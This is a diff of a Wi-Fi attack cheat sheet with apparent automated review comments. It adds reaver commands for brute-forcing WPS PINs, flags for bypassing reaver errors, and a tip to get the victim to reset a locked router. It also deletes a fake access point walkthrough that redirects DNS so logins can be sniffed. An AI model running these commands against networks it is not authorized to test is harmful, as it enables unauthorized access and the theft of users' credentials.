@@ -208,7 +208,7 @@ of the connected clients, instead of the mac address of our network interface:

*** WPA/WPA2

-**** Without a wordlist
+**** Without a wordlist (WPS)

To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the
WPS authentication system, if it's misconfigured.
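Review bot: the renamed heading now scopes this section to WPS, but the sentence that follows it still only says the WPS authentication system can be exploited "if it's misconfigured" without saying what the misconfiguration is, so the reader cannot tell which access points this section applies to. Suggest stating the precondition in that sentence (WPS enabled with the PIN method that the next section brute-forces), so heading and body agree, and noting in the same place that disabling WPS, or at least its PIN method, on the access point closes this path entirely; the cheat sheet is as useful for hardening as for testing and this is the one-line fix.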
@@ -228,9 +228,24 @@ and to crack the network, we first need to associate with the network:
and then, we can bruteforce the WPS pin:

#+BEGIN_SRC bash
- reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv --no-associate
+ reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A
#+END_SRC

+***** Bypassing 0x2 and 0x3 errors
+
+In case we get 0x3 and 0x4 errors in reaver, we can add the ~-N~ argument, to
+stop it from sending NACK messages, the end command would be like this:
+
+#+BEGIN_SRC bash
+ reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N
+#+END_SRC
+
+***** Bypassing WPS Lock
+
+We exploit WPS by bruteforcing its pin, this means we try every possible pin,
+some routers lock after a number of failed attemps. The solution is to either
+reset the router, or to get the user to reset their router.
+
**** With a wordlist

First, we need to capture the handshake, to do that, we just need to run
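Review bot: the new subheading and its body disagree on which error codes it covers: `+***** Bypassing 0x2 and 0x3 errors` names 0x2 and 0x3, while the paragraph under it says `+In case we get 0x3 and 0x4 errors in reaver`; pick one set and use it in both places. Two smaller points in the same hunk: `attemps` should be `attempts`, and the second reaver invocation drops the `-vvv` that the first one keeps, so either both commands should carry it or the text should say the verbosity flag is optional. Finally, the `Bypassing WPS Lock` subsection does not describe a bypass; the only remedy it offers is resetting the router, so the heading overstates what follows. Renaming it to plain "WPS lock" and saying directly that the lock is the access point rate-limiting failed PIN attempts, which is precisely the behaviour that defeats this approach and the reason vendors added it, would make the section accurate.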
@@ -416,64 +431,7 @@ need to first, flush iptables:
iptables -p FORWARD ACCEPT
#+end_src

-We need a dnsmasq configuration file:
-
-#+begin_src text
- interface=[interface_name]
- dhcp-range=[ip_range_given_to_clients]
- dhcp-option=3,[gateway_ip_address]
- dhcp-option=6,[dns_server_address]
- address=/#/[address_to_redirect_to]
-#+end_src
-
-For example:
-
-#+begin_src text
- interface=wlan0
- dhcp-range=10.0.0.10,10.0.0.100,8h
- dhcp-option=3,10.0.0.1 # computer ip address
- dhcp-option=6,10.0.0.1
- address=/#/10.0.0.1
-#+end_src
-
-And we can run dnsmasq like this:
-
-#+begin_src bash
- dnsmasq -C [config_file_location]
-#+end_src
-
-And we also need a configuration file for hostapd:
-
-#+begin_src text
- interface=[interface_name]
- ssid=[ssid]
- channel=[channel]
- driver=[driver]
-#+end_src
-
-For example:
-
-#+begin_src text
- interface=wlan0
- ssid=wifi
- channel=1
- driver=nl80211
-#+end_src
-
-And we have now to execute hostapd:
-
-#+begin_src bash
- hostapd [config_file] -B
-#+end_src
-
-When hostapd is running, we must give an IP addres to our interface name, which
-in previous examples was wlan0:
-
-#+begin_src bash
- ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
-#+end_src
-
-And now, we can sniff the login information with wireshark.
+*** WPA/WPA2 Enterprise

** Post-Connection Attacks
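Review bot: this hunk deletes the entire dnsmasq/hostapd walkthrough (both configuration templates, their examples, the dnsmasq, hostapd and ifconfig steps, and the closing sentence about sniffing login information with wireshark) and adds only `+*** WPA/WPA2 Enterprise`, an empty heading sitting directly above `** Post-Connection Attacks`. If the fake-AP material is being moved elsewhere, the commit message should say where it went; if it is being dropped, the stub heading should not be committed empty, because it leaves a dangling section in the rendered document. Separately, the unchanged context line `iptables -p FORWARD ACCEPT` at the top of the hunk looks wrong: in iptables `-p` is the protocol match and the chain default policy is set with `-P` (capital), so the command as written will be rejected rather than open forwarding as the surrounding text intends; worth correcting while this area is being edited.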